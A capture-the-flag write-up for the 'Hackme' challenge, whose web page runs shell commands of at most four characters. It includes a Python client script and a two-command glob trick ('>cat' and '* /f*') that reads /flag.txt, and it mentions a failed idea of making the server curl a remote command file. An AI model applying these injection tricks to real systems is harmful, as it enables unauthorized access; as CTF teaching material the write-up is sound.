Rating:

# Hackme
We were given the challenge text:

can you please just hack me, I will execute all your commands but only 4 chars in length

EU instance

US instance

author: pop_eax


I personally would say that this is closer to a misc challenge than a web, but it was still fun! The website was pretty much just a web interface for a shell, so I made a (way too advanced) Python script to interact with it.
py
import requests

servers = {
'eu': 'http://207.180.200.166:8000/',
'us': 'http://45.134.3.200:8000/'
}

server = input(f'EU or US?\n> ').lower()

url = servers[server]

while True:
cmd = input('\$ ')

if cmd == 'reset':
res = requests.get(f'{url}/?reset=1').text
elif cmd == 'q':
quit()
else:
res = requests.get(f'{url}/?cmd={cmd}').text
print(res)


Our goal was to view the contents of the flag in /flag.txt. In typical me style, I overcomplicated everything. I spent probably a day trying to craft an exploit that allowed me to curl my own server for a file containg cat /flag.txt, but of course curl didn't work, and I had to try again. A lot of my earlier testing included *, so I had done some researching on how exactly it works. After a bit of thinking, I realized I could create a file titled cat, and if it was the only file in the directory I could simply type *, and it would be replaced by cat. The final solution was a simple 2 lines: >cat (creates the file) and * /f* (cats /flag.txt). The result was flag{[email protected]_5pl1t_Em3012}.

Original writeup (https://github.com/WastefulNick/CTF-Writeups/tree/master/0x41414141/web/hackme).